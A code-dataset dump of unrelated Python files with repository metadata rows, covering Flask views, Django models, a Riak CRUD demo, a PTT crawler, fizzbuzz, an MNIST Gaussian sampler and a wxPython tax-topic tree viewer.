        path_trace = index.split(".")
        for trace in path_trace:
            path = os.path.join(path, trace)
        path = path + self.__suffix
        if not os.path.exists(path):
            logger.info("执行中,未存在的文件,正在创建文件,路径:{}".format(path))
            touch(path)
            self.__load_data()
        self.clear_table(index)
        self.init_table(index, fields)
        return index
    @auto_get_table
    def clear_table(self, index, table=None):
        del index
        return table.clear()
    @auto_get_table
    def init_table(self, index, fields, table=None):
        del index
        return table.create(fields)
    def copy(self, index_pairs):
        """Copy table files for each (source_index, target_index) pair, then reload."""
        for index_pair in index_pairs:
            source_table = get_table(self, index_pair[0])
            target_table = get_table(self, index_pair[1])
            shutil.copy(source_table.path, target_table.path)
        self.__load_data()
        return
# Module-level singleton: parse the DB configuration and build the default
# engine (this scans the data directory once at import time).
db_config = config_parser(config_init.db.path)
default_db_engine = DB(db_config)
| [
"reqinfeng2008@gmail.com"
] | reqinfeng2008@gmail.com |
175f152d05ef49c12354b7ffb06d8f723803c2c9 | 9246c85dd13e52719a97fac2769bf4cc387e34aa | /app/main/views.py | 352d9ddb2a8c2986af19f419937af9ca6c85d687 | [] | no_license | Heersin/flask-quick-scaffold | 5d8add1cd8178a2ab6284bf08e65ae32dc0e2d71 | 31ab2b80b41d9248b495aacfbbb8ddb2ca2d426f | refs/heads/master | 2021-04-07T04:16:28.240400 | 2020-04-17T17:36:45 | 2020-04-17T17:36:45 | 248,645,232 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,218 | py | from flask import render_template, redirect, request, url_for, flash
from .forms import ClientForm
from . import main, mychart
import os
from app.models import Client
@main.route('/')
def root():
    """Redirect the bare site root to the index page."""
    return redirect(url_for('main.index'))
@main.route('/index')
def index():
    """Render the landing page."""
    return render_template('main/new_index.html')
@main.route('/report/<mode>', methods=['GET', 'POST'])
def report(mode):
    """Show one of three pyecharts reports chosen by *mode* ('1'..'3').

    POST redirects back to the index; an unknown mode renders the 404 page.
    """
    REMOTE_HOST="https://pyecharts.github.io/assets/js"
    # All three charts are rendered up front, exactly like the original code.
    charts = {
        '1': mychart.liquid.render_embed(),
        '2': mychart.parallel.render_embed(),
        '3': mychart.heatmap.render_embed(),
    }
    print(os.getcwd())
    if request.method == 'POST':
        return redirect(url_for('main.index'))
    elif request.method == 'GET':
        chart = charts.get(mode)
        if chart is not None:
            return render_template('main/new_report.html', chart=chart, host=REMOTE_HOST)
        return render_template('errors/404.html')
    else:
        return render_template('errors/404.html')
| [
"muse208@qq.com"
] | muse208@qq.com |
def arithmetic_arranger(problems, answer=False):
    """Arrange vertical arithmetic problems side by side.

    Each problem is a string like "32 + 698". Returns the arranged text
    (operands right-aligned, a dash rule, optionally the results) or an
    "Error: ..." message string for invalid input.

    Fixes vs. the original: the too-many-problems check was inverted
    (``<= 5`` rejected valid input), the final ``"\\n".join(outputS)`` tried
    to join lists of strings and raised TypeError on every call, and invalid
    input crashed via ``assert`` instead of returning an error message.
    """
    if len(problems) > 5:
        return "Error: Too many problems."
    top, bottom, dashes, results = [], [], [], []
    for prob in problems:
        a, op, b = prob.split()
        if op not in ("+", "-"):
            return "Error: Operator must be '+' or '-'."
        if not (a.isdigit() and b.isdigit()):
            return "Error: Numbers must only contain digits."
        if len(a) > 4 or len(b) > 4:
            return "Error: Numbers cannot be more than four digits."
        # Column width: widest operand plus operator and one space.
        width = max(len(a), len(b)) + 2
        top.append(a.rjust(width))
        bottom.append(op + b.rjust(width - 1))
        dashes.append("-" * width)
        if answer:
            result = int(a) + int(b) if op == "+" else int(a) - int(b)
            results.append(str(result).rjust(width))
    rows = [top, bottom, dashes]
    if answer:
        rows.append(results)
    # Problems are separated by four spaces; rows by newlines.
    return "\n".join("    ".join(row) for row in rows)
| [
"noreply@github.com"
] | aoeu256.noreply@github.com |
5bed9df02107cc457888e09dc4a4f4012d2b9405 | 4f6beba19a2aad878b04ef523495a591849a5097 | /riak/mian.py | 2057e0ba6848a84f22d344805cf09fc1deeb7997 | [] | no_license | zofiamaszlanka/nbd | 9ffad05e70e167a0b336a0d8e9abbf1527afd2b8 | d0cd9043a46c6e20d91321c4a0bd88282222f74d | refs/heads/main | 2023-06-02T10:12:20.467008 | 2021-06-27T22:21:39 | 2021-06-27T22:21:39 | 380,843,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import requests
# Base URL of the Riak HTTP API bucket used by this CRUD demo (local node).
URL = 'http://localhost:8098/buckets/s22555/keys/'
print("\ncreate: ")
shoes = {'brand': 'Spraindi', 'size': 37, 'price': 99}
print(requests.post(URL + "sprandi", data=shoes))
print("\nget: ")
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text)
print("\nupdate: ")
# Same key, new price: PUT overwrites the stored value.
shoes_updated = {'brand': 'Spraindi', 'size': 37, 'price': 88}
print(requests.put(URL + "sprandi", data=shoes_updated))
print("\nget: ")
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text)
print("\ndelete: ")
print(requests.delete(URL + "sprandi"))
print("\nget: ")
# After deletion this GET is expected to return a not-found response.
print(requests.get(URL + "sprandi"))
print(requests.get(URL + "sprandi").text)
"s22555@pjwstk.edu.pl"
] | s22555@pjwstk.edu.pl |
1496c6926500134828feb54cde9f2ff4147b1331 | 1ea77105dc42b6f7103ba93d00f981c546a10c63 | /saas/web/models.py | e338c9db3c66b89f4810296e7c4b14074f0eba42 | [] | no_license | cat-fans/web_back | 23845ac5b73cf5ad99dcfd53c1b38d068dc8c9c9 | 1c405be433159223bf8e2f35aaf40d934b99ae9b | refs/heads/master | 2023-03-02T21:57:15.888633 | 2021-02-04T22:07:59 | 2021-02-04T22:07:59 | 331,644,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,845 | py | from django.db import models
class UserInfo(models.Model):
username = models.CharField(verbose_name='用户名', max_length=32, db_index=True) # db_index=True 索引
email = models.EmailField(verbose_name='邮箱', max_length=32)
mobile_phone = models.CharField(verbose_name='手机号', max_length=32)
password = models.CharField(verbose_name='密码', max_length=32)
# price_policy = models.ForeignKey(verbose_name='价格策略', to='PricePolicy', null=True, blank=True)
def __str__(self):
return self.username
class PricePolicy(models.Model):
""" 价格策略 """
category_choices = (
(1, '免费版'),
(2, '收费版'),
(3, '其他'),
)
category = models.SmallIntegerField(verbose_name='收费类型', default=2, choices=category_choices)
title = models.CharField(verbose_name='标题', max_length=32)
price = models.PositiveIntegerField(verbose_name='价格') # 正整数
project_num = models.PositiveIntegerField(verbose_name='项目数')
project_member = models.PositiveIntegerField(verbose_name='项目成员数')
project_space = models.PositiveIntegerField(verbose_name='单项目空间', help_text='G')
per_file_size = models.PositiveIntegerField(verbose_name='单文件大小', help_text="M")
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
class Transaction(models.Model):
""" 交易记录 """
status_choice = (
(1, '未支付'),
(2, '已支付')
)
status = models.SmallIntegerField(verbose_name='状态', choices=status_choice)
order = models.CharField(verbose_name='订单号', max_length=64, unique=True) # 唯一索引
user = models.ForeignKey(verbose_name='用户', to='UserInfo')
price_policy = models.ForeignKey(verbose_name='价格策略', to='PricePolicy')
count = models.IntegerField(verbose_name='数量(年)', help_text='0表示无限期')
price = models.IntegerField(verbose_name='实际支付价格')
start_datetime = models.DateTimeField(verbose_name='开始时间', null=True, blank=True)
end_datetime = models.DateTimeField(verbose_name='结束时间', null=True, blank=True)
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
class Project(models.Model):
""" 项目表 """
COLOR_CHOICES = (
(1, "#56b8eb"), # 56b8eb
(2, "#f28033"), # f28033
(3, "#ebc656"), # ebc656
(4, "#a2d148"), # a2d148
(5, "#20BFA4"), # #20BFA4
(6, "#7461c2"), # 7461c2,
(7, "#20bfa3"), # 20bfa3,
)
name = models.CharField(verbose_name='项目名', max_length=32)
color = models.SmallIntegerField(verbose_name='颜色', choices=COLOR_CHOICES, default=1)
desc = models.CharField(verbose_name='项目描述', max_length=255, null=True, blank=True)
use_space = models.BigIntegerField(verbose_name='项目已使用空间', default=0, help_text='字节')
star = models.BooleanField(verbose_name='星标', default=False)
join_count = models.SmallIntegerField(verbose_name='参与人数', default=1)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
bucket = models.CharField(verbose_name='cos桶', max_length=128)
region = models.CharField(verbose_name='cos区域', max_length=32)
# 查询:可以省事;
# 增加、删除、修改:无法完成
# project_user = models.ManyToManyField(to='UserInfo',through="ProjectUser",through_fields=('project','user'))
class ProjectUser(models.Model):
""" 项目参与者 """
project = models.ForeignKey(verbose_name='项目', to='Project')
user = models.ForeignKey(verbose_name='参与者', to='UserInfo')
star = models.BooleanField(verbose_name='星标', default=False)
create_datetime = models.DateTimeField(verbose_name='加入时间', auto_now_add=True)
class Wiki(models.Model):
project = models.ForeignKey(verbose_name='项目', to='Project')
title = models.CharField(verbose_name='标题', max_length=32)
content = models.TextField(verbose_name='内容')
depth = models.IntegerField(verbose_name='深度', default=1)
# 子关联
parent = models.ForeignKey(verbose_name='父文章', to="Wiki", null=True, blank=True, related_name='children')
def __str__(self):
return self.title
class FileRepository(models.Model):
""" 文件库 """
project = models.ForeignKey(verbose_name='项目', to='Project')
file_type_choices = (
(1, '文件'),
(2, '文件夹')
)
file_type = models.SmallIntegerField(verbose_name='类型', choices=file_type_choices)
name = models.CharField(verbose_name='文件夹名称', max_length=32, help_text="文件/文件夹名")
key = models.CharField(verbose_name='文件储存在COS中的KEY', max_length=128, null=True, blank=True)
# int类型最大表示的数据
file_size = models.BigIntegerField(verbose_name='文件大小', null=True, blank=True, help_text='字节')
file_path = models.CharField(verbose_name='文件路径', max_length=255, null=True,
blank=True) # https://桶.cos.ap-chengdu/....
parent = models.ForeignKey(verbose_name='父级目录', to='self', related_name='child', null=True, blank=True)
update_user = models.ForeignKey(verbose_name='最近更新者', to='UserInfo')
update_datetime = models.DateTimeField(verbose_name='更新时间', auto_now=True)
class Issues(models.Model):
""" 问题 """
project = models.ForeignKey(verbose_name='项目', to='Project')
issues_type = models.ForeignKey(verbose_name='问题类型', to='IssuesType')
module = models.ForeignKey(verbose_name='模块', to='Module', null=True, blank=True)
subject = models.CharField(verbose_name='主题', max_length=80)
desc = models.TextField(verbose_name='问题描述')
priority_choices = (
("danger", "高"),
("warning", "中"),
("success", "低"),
)
priority = models.CharField(verbose_name='优先级', max_length=12, choices=priority_choices, default='danger')
# 新建、处理中、已解决、已忽略、待反馈、已关闭、重新打开
status_choices = (
(1, '新建'),
(2, '处理中'),
(3, '已解决'),
(4, '已忽略'),
(5, '待反馈'),
(6, '已关闭'),
(7, '重新打开'),
)
status = models.SmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
assign = models.ForeignKey(verbose_name='指派', to='UserInfo', related_name='task', null=True, blank=True)
attention = models.ManyToManyField(verbose_name='关注者', to='UserInfo', related_name='observe', blank=True)
start_date = models.DateField(verbose_name='开始时间', null=True, blank=True)
end_date = models.DateField(verbose_name='结束时间', null=True, blank=True)
mode_choices = (
(1, '公开模式'),
(2, '隐私模式'),
)
mode = models.SmallIntegerField(verbose_name='模式', choices=mode_choices, default=1)
parent = models.ForeignKey(verbose_name='父问题', to='self', related_name='child', null=True, blank=True,
on_delete=models.SET_NULL)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_problems')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
latest_update_datetime = models.DateTimeField(verbose_name='最后更新时间', auto_now=True)
def __str__(self):
return self.subject
class Module(models.Model):
""" 模块(里程碑)"""
project = models.ForeignKey(verbose_name='项目', to='Project')
title = models.CharField(verbose_name='模块名称', max_length=32)
def __str__(self):
return self.title
class IssuesType(models.Model):
""" 问题类型 例如:任务、功能、Bug """
PROJECT_INIT_LIST = ["任务", '功能', 'Bug']
title = models.CharField(verbose_name='类型名称', max_length=32)
project = models.ForeignKey(verbose_name='项目', to='Project')
def __str__(self):
return self.title
class IssuesReply(models.Model):
""" 问题回复"""
reply_type_choices = (
(1, '修改记录'),
(2, '回复')
)
reply_type = models.IntegerField(verbose_name='类型', choices=reply_type_choices)
issues = models.ForeignKey(verbose_name='问题', to='Issues')
content = models.TextField(verbose_name='描述')
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_reply')
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
reply = models.ForeignKey(verbose_name='回复', to='self', null=True, blank=True)
class ProjectInvite(models.Model):
""" 项目邀请码 """
project = models.ForeignKey(verbose_name='项目', to='Project')
code = models.CharField(verbose_name='邀请码', max_length=64, unique=True)
count = models.PositiveIntegerField(verbose_name='限制数量', null=True, blank=True, help_text='空表示无数量限制')
use_count = models.PositiveIntegerField(verbose_name='已邀请数量', default=0)
period_choices = (
(30, '30分钟'),
(60, '1小时'),
(300, '5小时'),
(1440, '24小时'),
)
period = models.IntegerField(verbose_name='有效期', choices=period_choices, default=1440)
create_datetime = models.DateTimeField(verbose_name='创建时间', auto_now_add=True)
creator = models.ForeignKey(verbose_name='创建者', to='UserInfo', related_name='create_invite')
| [
"qaq_cat_fans@163.com"
] | qaq_cat_fans@163.com |
12f82502a50aa68c38ef68424a7ca051b4fa9948 | 3cb9b94a2ddbc3b6f65a10efd63db4a84619a7d8 | /crawler.py | 6d4d469a97002d77f948f3c1448f2a68923fc798 | [] | no_license | allen0818/simple-ptt-crawler | f01fd33ffb09d3f33bf674b1edd7c96ae7d4fe38 | 6ed729903b3f7a53578271ae0f7c1bfc99df45c2 | refs/heads/master | 2021-05-21T02:19:49.442198 | 2020-04-02T16:18:09 | 2020-04-02T16:18:09 | 252,499,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | import urllib.request as req
from bs4 import BeautifulSoup
# NSWITCH_BOARD =
url_nswitch = "https://www.ptt.cc/bbs/NSwitch/index.html"
url_gossiping = "https://www.ptt.cc/bbs/Gossiping/index.html"
def get_titles(url):
    """Fetch one PTT board index page, print its article titles, and
    return the relative URL of the previous (older) page.

    The over18 cookie bypasses the age gate; a browser User-Agent avoids
    trivial bot blocking.
    """
    # fetch website
    request = req.Request(url, headers={
        "cookie": "over18=1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36"
    })
    with req.urlopen(request) as response:
        data = response.read().decode("utf-8")
    # use bs4 to parse specific data
    root = BeautifulSoup(data, "html.parser")
    titles = root.find_all("div", class_="title")
    for title in titles:
        if title.a:
            print(title.a.string)
    # return url of next page
    next_page_btn = root.find("a", string="‹ 上頁")
    return next_page_btn["href"]
def get_multipages(board, url, page_count=None):
    """Print article titles for *board*, walking *page_count* pages backwards.

    With no (or zero) page_count, only the given page is dumped.
    """
    print("Articles in {}:".format(board))
    next_page = url
    if not page_count:
        get_titles(next_page)
    else:
        for _ in range(page_count):
            # get_titles returns a relative href; prefix the site host.
            next_page = "http://www.ptt.cc" + get_titles(next_page)
def run():
    """Entry point: dump the newest NSwitch page and three Gossiping pages."""
    get_multipages("NSwitch", url_nswitch)
    get_multipages("Gossiping", url_gossiping, 3)
if __name__ == '__main__':
run() | [
"chshman310222@gmail.com"
] | chshman310222@gmail.com |
1c8937910a3a56ccad8dea727c5b37a6074a5cc7 | fae08819d8f0e72999adb74f653a4b088578d6dc | /API/desafio-api-produtos/api_produtos/api_produtos/asgi.py | 6e30b5a724c974985c1b02b09da8e5c1e40f47b8 | [] | no_license | konkah/desafio-aws-eks | a321a77d57ab2f60ce64dbb5755efde1b3919c56 | 0b159540e84b5ad71cb02f0da925f27abd9e7c6a | refs/heads/main | 2023-06-18T10:35:00.520565 | 2021-07-14T20:15:09 | 2021-07-14T20:15:09 | 383,628,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
ASGI config for api_produtos project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# The settings module must be configured before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_produtos.settings')
# Module-level ASGI callable that servers (uvicorn/daphne) import.
application = get_asgi_application()
| [
"karlos.hbraga@gmail.com"
] | karlos.hbraga@gmail.com |
4d5ad693ce20e9b97da95b0ef67213eb07bc3c1f | 03a10a552e3019e23efb38086b239659183b59c5 | /src/tiles.py | 9a62ef786790072c5d44c7e7c8a4ca34abcb3e98 | [
"MIT"
] | permissive | GreenXenith/zoria | 54a5c067a7d460a9126acf9c2085ad3ee5905fe1 | 30a16baab3643c820613a8c8669ee6235a2cd47c | refs/heads/master | 2023-02-22T14:19:34.674436 | 2021-01-29T22:03:44 | 2021-01-29T22:03:44 | 334,269,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,354 | py | import pygame
global registered_tiles  # NOTE(review): `global` at module scope is a no-op; kept as-is
registered_tiles = {}
# Content IDs are currently unused
# They would be used for map-saving
content_ids = []
content_id_map = {}
def register_tile(name, definition):
    """Register *definition* under *name* and assign it the next content id."""
    new_id = len(content_ids)
    registered_tiles[name] = definition
    content_id_map[name] = new_id
    content_ids.append(name)
def get_content_id(name):
    """Return the numeric content id registered for *name*, or None.

    dict.get replaces the original bare try/except, which also silently
    swallowed unrelated errors.
    """
    return content_id_map.get(name)
def get_tile_from_content_id(id):
    """Return the registered tile definition for numeric content *id*, or None."""
    try:
        return registered_tiles[content_ids[id]]
    # Narrowed from a bare except: only the expected lookup failures
    # (bad index, unregistered name, non-integer id) map to None.
    except (IndexError, KeyError, TypeError):
        return None
class Tile:
    """A placed tile instance; definition attributes come from the registry."""
    # Class-level defaults, overridden per-definition in __init__.
    textures = ["none.png"]
    solid = True
    rotation = 0

    def __init__(self, name, pos):
        """Copy every non-callable field of the registered definition onto self."""
        self.name = name
        self.pos = pos
        for key in registered_tiles[name]:
            value = registered_tiles[name][key]
            if not callable(value):
                setattr(self, key, value)

    def get(self, key):
        """Return attribute *key*, or None when absent.

        3-arg getattr replaces the original bare try/except, which could
        hide real errors raised by property-like attributes.
        """
        return getattr(self, key, None)

    def set_rotation(self, rot):
        self.rotation = rot

    def get_rotation(self):
        return self.rotation

    def is_solid(self):
        # Strict comparison with True kept from the original semantics.
        return self.get("solid") == True

    def on_step(self, dtime, map, player):
        """Dispatch to the definition's on_step callback when one exists."""
        if "on_step" in registered_tiles[self.name]:
            registered_tiles[self.name]["on_step"](self, dtime, map, player)
| [
"24834740+GreenXenith@users.noreply.github.com"
] | 24834740+GreenXenith@users.noreply.github.com |
fb125b831dfdd12ef020ba37e389a57e9312650c | 08379db5712432b34767d747b9f078ab30822d74 | /tdd/counter.py | 7b6c18b587d99d5bf211cdcbdafb50576a2a4e78 | [
"MIT"
def fizzbuzz(count):
    """Return 'Fizzbuzz'/'Fizz'/'Buzz' for multiples of 15/3/5, else *count*.

    Restores a clean definition line (the original header was garbled by
    interleaved dataset metadata) and drops the call-style parentheses
    around the return values.
    """
    if count % 15 == 0:
        return 'Fizzbuzz'
    elif count % 3 == 0:
        return 'Fizz'
    elif count % 5 == 0:
        return 'Buzz'
    else:
        return count
def main():
    """Print the fizzbuzz sequence for 1..100."""
    for count in range(1, 101):
        # print() call form works on both Python 2 and 3; the original
        # `print fizzbuzz(count)` statement is a SyntaxError on Python 3.
        print(fizzbuzz(count))
if __name__=='__main__':
    main()
| [
"trumpysm@dukes.jmu.edu"
] | trumpysm@dukes.jmu.edu |
1eccb89c21839695c2e7fceeac48858578fdcc38 | 6e9df4bf681978c15d408b1e8f8278f26a0346b4 | /complete/bayes_sampling.py | d66267184769140ba310bf49c3cb5c896a0c850d | [] | no_license | dungdinhanh/gan_training | f3177972d857594ed5fd52f7b9d0e157b6680695 | 4e80f0e8f112f4e4d6a7d937f30ba0cfa09e1339 | refs/heads/master | 2020-09-13T09:41:03.941638 | 2019-12-20T09:20:21 | 2019-12-20T09:20:21 | 222,729,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,370 | py | import numpy as np
from scipy.stats import multivariate_normal as mvn
from complete.util import *
from matplotlib import pyplot as plt
from sklearn.mixture import BayesianGaussianMixture
class SingleGauss:
    """One multivariate Gaussian fitted per class.

    NOTE(review): ``means_`` and ``count`` are *class-level* shared state —
    every fitted instance appends to the same list and ``self.y`` is the
    instance's index into it. Fitting two samplers in one process would mix
    their means; confirm before reuse.
    """
    means_ = None
    count = None
    @staticmethod
    def get_mean():
        # Lazily create the shared list of class means on first use.
        if SingleGauss.means_ is None:
            SingleGauss.means_ = []
            SingleGauss.count = 0
            return SingleGauss.means_
        else:
            return SingleGauss.means_
    def __init__(self):
        self.y = None
        self.mean = None
        self.cov = None
    def fit(self, X):
        """Estimate the sample mean and covariance of the class data X."""
        self.mean = X.mean(axis=0)
        mean = SingleGauss.get_mean()
        mean.append(self.mean)
        self.y = SingleGauss.count
        SingleGauss.count+=1
        self.cov = np.cov(X.T)
    def sample(self):
        # One (1, D) draw from N(mean, cov) plus this component's index.
        return np.array([mvn.rvs(mean=self.mean, cov=self.cov)]), self.y
class BayesianSampler:
    """Class-conditional generative sampler: one density model per label.

    *model* is a class exposing ``fit(X)``, ``sample()`` and ``means_``;
    one instance is fitted per distinct label found in Y.
    """
    def __init__(self, model):
        self.model = model
    def fit(self, X, Y, fit_clusters=False ,default_clusters=10):
        """Fit one density model per label; record the label distribution."""
        self.K = len(set(Y))
        self.gaussians = []
        self.mean_y = Y.mean()
        self.std_y = Y.std()
        for k in range(self.K):
            print("Fitting model " + str(self.model), k)
            Xk = X[Y==k]
            # Pass the cluster count only to models that take one (e.g. BGM).
            if not fit_clusters:
                mod = self.model()
            else:
                mod = self.model(default_clusters)
            mod.fit(Xk)
            self.gaussians.append(mod)
    def sample_given_y(self, y: int):
        """Draw one sample for label *y*; returns (image, component_mean),
        both reshaped to 28x28 (MNIST-sized)."""
        mod = self.gaussians[y]
        sample = mod.sample()
        mean = mod.means_[sample[1]]
        return sample[0].reshape(28, 28), mean.reshape(28, 28)
    def sample(self):
        """Sample a label from a normal fit of the label distribution, then
        an image for that label.

        BUG FIX: the original clamped to min(10, ...); with exactly 10
        classes (digits 0..9) that allowed y == 10 and an IndexError into
        self.gaussians. Clamp to the last valid index instead.
        """
        y = max(0, min(self.K - 1, np.random.normal(self.mean_y, self.std_y)))
        return self.sample_given_y(int(y))
if __name__ == '__main__':
    # Demo: fit one Gaussian per digit class on MNIST, then display a
    # generated sample next to the class mean for a chosen digit, for every
    # digit, and for a randomly sampled label. ("generatate" below is a typo
    # in a runtime title string and is deliberately left untouched.)
    # b = BayesianSampler(BayesianGaussianMixture)
    # mnist = get_mnist()
    # b.fit(mnist[0], mnist[1], fit_clusters=True)
    #
    # for k in range(b.K):
    #     gen, mean = b.sample_given_y(k)
    #     plt.subplot(1, 2, 1)
    #     plt.imshow(gen, cmap='gray')
    #     plt.title("generatate")
    #     plt.subplot(1, 2, 2)
    #     plt.imshow(mean, cmap='gray')
    #     plt.title("mean")
    #     plt.show()
    #
    # gen, mean = b.sample()
    # plt.subplot(1, 2, 1)
    # plt.imshow(gen, cmap='gray')
    # plt.title("random generate")
    # plt.subplot(1, 2, 2)
    # plt.imshow(gen, cmap='gray')
    # plt.title("random mean")
    # plt.show()
    b = BayesianSampler(SingleGauss)
    mnist = get_mnist()
    b.fit(mnist[0], mnist[1])
    k = input("Input digit: ")
    gen, mean = b.sample_given_y(int(k))
    plt.subplot(1, 2, 1)
    plt.imshow(gen, cmap='gray')
    plt.title("generatate")
    plt.subplot(1, 2, 2)
    plt.imshow(mean, cmap='gray')
    plt.title("mean")
    plt.show()
    for k in range(b.K):
        gen, mean = b.sample_given_y(k)
        plt.subplot(1, 2, 1)
        plt.imshow(gen, cmap='gray')
        plt.title("generatate")
        plt.subplot(1, 2, 2)
        plt.imshow(mean, cmap='gray')
        plt.title("mean")
        plt.show()
    gen, mean = b.sample()
    plt.subplot(1, 2, 1)
    plt.imshow(gen, cmap='gray')
    plt.title("random generate")
    plt.subplot(1, 2, 2)
    plt.imshow(gen, cmap='gray')
    plt.title("random mean")
    plt.show()
| [
"dinhanhdung1996@gmail.com"
] | dinhanhdung1996@gmail.com |
64e7542df83df9bd0d6edf9f81dd3c5add9aef71 | 0800aac473cbb94f3ac263c202979498c326cf18 | /법인세_총설.py | a437c75324c85c0332211d27ad24fe8df470b893 | [] | no_license | DanielHennyKwon/TAX_LIM_JEONG | 8f12e072c044cd17646f196c17b51d1e0cae179e | a263b4e90f0ac78500382047bf7ae72380213ca8 | refs/heads/master | 2023-06-16T10:50:55.111407 | 2021-07-11T02:59:50 | 2021-07-11T02:59:50 | 384,847,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,432 | py | # -*- coding: utf-8 -*-
# 2018-12-24 권달현
import 결산의확정, 신고납부절차, 기한후신고, 수정신고, 경정청구, 법인의분류, 세금의종류, 실질과세, 소액주주, 대주주, 중소기업, 이월과세, 과세이연, 세무조정, 소득처분, 법인세비용, 세액계산_구조,세무조정_흐름도
_={
"결산의 확정":결산의확정.결산의확정,
"법인세의 신고납부절차":신고납부절차.법인세,
"기한후신고":기한후신고.법인세,
"수정신고":수정신고._,
"경정청구":경정청구._,
"법인세법상 법인의 분류":법인의분류.법인세,
"법인세의 종류":세금의종류.법인세,
"실질과세":실질과세.법인세,
"소액주주":소액주주.법인세,
"대주주":대주주.법인세,
"중소기업":중소기업._,
"이월과세":이월과세.법인세,
"과세이연":과세이연.법인세,
"세무조정 흐름도":세무조정_흐름도.법인세,
"세무조정":세무조정.법인세,
"소득처분":소득처분.법인세,
"법인의 각 사업연도소득과 과세표준 및 세액계산의 구조":세액계산_구조.법인세,
"법인세비용":법인세비용.법인세,
}
#___________________________________________________
제목='법인세 총설'  # window title ("Corporate tax: general overview")
# Alias the topic mapping for the tree-building UI below.
tax=_
import wx
class MyFrame(wx.Frame):
    """Tree-view browser over the nested corporate-tax topic dictionary."""
    def __init__(self):
        wx.Frame.__init__(self,parent=None,title=제목)
        self.SetSize(420,320*2)
        self.mainPanel=wx.Panel(self)
        self.expandButton=wx.Button(self.mainPanel,label='펼침')
        self.tree=wx.TreeCtrl(self.mainPanel)
        root=self.tree.AddRoot(제목)
        # Build the tree by walking up to eight nested dict levels.
        for i in tax:
            ii=self.tree.AppendItem(root,i)
            for j in tax[i]:
                jj=self.tree.AppendItem(ii,j)
                for k in tax[i][j]:
                    kk=self.tree.AppendItem(jj,k)
                    for m in tax[i][j][k]:
                        mm=self.tree.AppendItem(kk,m)
                        for n in tax[i][j][k][m]:
                            nn=self.tree.AppendItem(mm,n)
                            for p in tax[i][j][k][m][n]:
                                pp=self.tree.AppendItem(nn,p)
                                for q in tax[i][j][k][m][n][p]:
                                    qq=self.tree.AppendItem(pp,q)
                                    for r in tax[i][j][k][m][n][p][q]:
                                        rr=self.tree.AppendItem(qq,r)
        self.staticText =wx.TextCtrl(self.mainPanel,style=wx.TE_MULTILINE)
        self.vtBoxSizer=wx.BoxSizer(wx.VERTICAL)
        self.vtBoxSizer.Add(self.expandButton,0,wx.EXPAND|wx.ALL,5)
        self.vtBoxSizer.Add(self.tree ,5,wx.EXPAND|wx.ALL,5)
        self.vtBoxSizer.Add(self.staticText ,0,wx.EXPAND|wx.ALL,5)
        self.mainPanel.SetSizer(self.vtBoxSizer)
        self.Bind(wx.EVT_BUTTON ,self.OnExpandButton,self.expandButton)
        self.Bind(wx.EVT_TREE_SEL_CHANGED,self.OnNodeSelected,self.tree)
    def OnExpandButton(self,e):
        # Expand every node of the tree at once.
        self.tree.ExpandAll()
    def OnNodeSelected(self,e):
        # Mirror the selected node's text into the text box below the tree.
        selected=self.tree.GetSelection()
        self.staticText.SetLabel(self.tree.GetItemText(selected))
        self.mainPanel.Layout()
if __name__=='__main__':
    # Standard wxPython bootstrap: create app, show frame, run the event loop.
    app=wx.App()
    frame=MyFrame()
    frame.Show()
    app.MainLoop()
#___________________________________________________ | [
"cpahouse@naver.com"
] | cpahouse@naver.com |
655a655620f983caafb5b12283dfc5b1c274d08d | de28880dd1c46d0ee2def7e46066d12185fc9a4b | /sketchRnn_clean_v3/tools/utils.py | 9458cfa2b2c2a28c3ca8f8fc65b2e8572ea10cad | [] | no_license | frederictamagnan/PredictDrumFillsInNativeInstrumentsSoundPack | c3712987352a152edf91e893e8af1b23fd17f495 | 2a19d43d5c153340f0a7a50e7314c4763a6089a4 | refs/heads/master | 2020-04-10T04:16:11.417914 | 2019-04-28T16:18:51 | 2019-04-28T16:18:51 | 160,793,133 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | PATH = '/home/ftamagna/Documents/_AcademiaSinica/dataset/lpd_5/lpd_5_cleansed/'
PATH_TAGS = [
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Blues.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Country.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Electronic.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Folk.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Jazz.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Latin.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Metal.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_New-Age.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Pop.id', # 8
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Punk.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Rap.id',
